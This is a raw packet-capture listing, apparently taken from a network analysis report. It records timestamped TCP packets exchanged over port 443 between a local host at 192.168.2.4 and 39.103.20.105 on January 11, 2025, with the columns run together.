                                  Jan 11, 2025 04:35:36.001574039 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001584053 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001588106 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001605988 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001610994 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001658916 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001658916 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001665115 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001704931 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.001830101 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.001878023 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002055883 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002091885 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002095938 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002113104 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002118111 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002142906 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002146959 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002156973 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002160072 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002177000 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002187967 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002213001 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002217054 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002266884 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002266884 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002439022 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002480984 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002494097 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002499104 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002525091 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002558947 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002681017 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002744913 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.002908945 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002973080 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.002999067 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.003004074 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.003014088 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.003030062 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.003057957 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.003063917 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.003107071 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.003285885 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.003325939 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.003343105 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.003390074 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.092196941 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.092274904 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.092313051 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.092387915 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.092462063 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.092525959 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.092540979 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.092593908 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.092725039 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.092773914 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.092890024 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.092942953 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093055010 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093097925 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093102932 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093110085 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093141079 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093316078 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093358994 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093374014 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093379021 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093401909 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093424082 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093633890 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093676090 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093692064 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093698025 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093708038 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093723059 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093733072 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093736887 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.093759060 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.093786955 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094054937 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094088078 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094101906 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094106913 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094131947 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094132900 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094150066 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094156027 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094175100 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094239950 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094361067 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094412088 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094502926 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094536066 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094554901 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094563007 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.094574928 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.094674110 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095062017 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095105886 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095113993 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095118999 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095160007 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095233917 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095233917 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095242977 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095310926 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095607996 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095652103 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095668077 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095673084 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095681906 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095700026 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095710993 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095721006 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095725060 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.095756054 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.095786095 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096077919 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096117020 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096137047 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096141100 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096151114 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096157074 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096188068 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096200943 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096205950 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096219063 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096230984 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096254110 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096262932 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096273899 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096306086 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.096636057 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.096694946 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.185355902 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.185427904 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.185487032 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.185563087 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.185578108 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.185641050 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.185688019 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.185754061 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.185888052 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.185951948 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186089993 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186161041 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186286926 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186336040 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186419010 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186485052 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186513901 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186609030 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186614990 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186651945 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186661959 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186703920 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186732054 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186844110 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.186924934 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.186949015 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.187000036 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.187352896 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.187427998 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.187475920 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.187558889 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.187565088 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.187589884 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.187621117 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.187630892 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.187757969 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.187803030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.188113928 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.188179970 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.188196898 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.188261032 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.188422918 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.188497066 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.188517094 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.188571930 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.188604116 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.188664913 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.188926935 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.188986063 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189026117 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189080000 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189121962 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189171076 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189205885 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189260006 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189404964 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189457893 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189553022 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189620972 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189644098 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189693928 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.189914942 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.189975023 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.190102100 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.190162897 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.190197945 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.190249920 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.190287113 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.190350056 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.246097088 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.277534008 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.277652025 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.277668953 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.277705908 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.277760983 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.277760983 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.277790070 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.277838945 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.277894974 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.277944088 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.277992964 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278078079 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278091908 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278155088 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278184891 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278239965 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278280973 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278374910 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278429031 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278486967 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278529882 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278597116 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278616905 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278671980 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.278773069 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.278824091 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279012918 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279079914 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279115915 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279175043 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279220104 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279278040 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279304028 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279359102 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279644012 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279702902 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279751062 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279804945 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279838085 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279918909 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.279941082 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.279999018 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280035019 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280093908 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280127048 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280190945 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280415058 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280483961 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280527115 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280582905 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280637026 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280693054 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280725956 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280786991 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.280814886 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.280874014 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.281163931 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.281249046 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.281285048 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.281343937 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.281382084 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.281439066 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.281482935 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.281543970 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.281564951 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.281615973 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.369798899 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.369893074 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.369904041 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.369915009 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.369954109 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.369960070 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.369975090 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.369992018 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370213032 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370270967 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370279074 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370320082 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370368958 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370374918 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370436907 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370488882 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370495081 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370683908 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370732069 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370738029 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370780945 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370826006 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370834112 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.370909929 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.370920897 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371036053 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371085882 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371145964 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371195078 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371234894 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371289015 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371371984 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371422052 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371499062 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371551037 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371592045 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371710062 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371743917 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371793032 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.371850014 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.371901035 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372033119 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372098923 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372147083 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372199059 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372370005 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372422934 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372493982 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372545958 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372589111 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372639894 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372700930 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372751951 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372802973 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372854948 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.372886896 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.372937918 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373248100 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373313904 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373359919 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373411894 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373462915 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373516083 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373569012 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373627901 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373663902 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373723030 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373752117 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373814106 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.373831034 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.373883963 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.374162912 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.374228954 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466118097 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466191053 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466214895 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466254950 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466344118 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466368914 CET4434996139.103.20.105192.168.2.4
                                  Jan 11, 2025 04:35:36.466440916 CET49961443192.168.2.439.103.20.105
                                  Jan 11, 2025 04:35:36.466463089 CET4434996139.103.20.105192.168.2.4
